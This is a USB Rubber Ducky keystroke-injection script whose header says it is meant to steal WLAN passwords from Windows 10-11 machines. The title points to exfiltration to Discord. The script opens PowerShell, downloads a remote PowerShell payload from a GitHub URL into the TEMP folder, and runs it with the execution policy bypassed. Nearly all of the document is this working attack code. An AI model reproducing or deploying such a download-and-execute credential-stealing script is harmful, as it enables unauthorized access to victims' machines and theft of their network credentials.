REM ###################################################################
REM #                                                                 |
REM # Title        : WLAN-Windows-Passwords-Discord-Exfiltration      |
REM # Author       : Aleff                                            |
REM # Description: A script used to stole target WLAN Passwords.      |
REM # Category     : Credentials                                      |
REM # Target       : Windows 10-11                                    |
REM # Version      : 1.0                                              |
REM #                                                                 |
REM ###################################################################
Ducky_lang ES


DELAY 2000
GUI r
DELAY 250
STRING powershell 
ENTER 
DELAY 1000
REM Provide payload
DEFINE PAYLOAD https://raw.githubusercontent.com/javirufo-ies/hacking/main/Windows-Passwords.ps1
STRINGLN $path = "$env:TEMP\script.ps1"
STRINGLN irm PAYLOAD -OutFile $path
STRINGLN powershell -ExecutionPolicy Bypass -File $path
DELAY 2000
STRINGLN exit
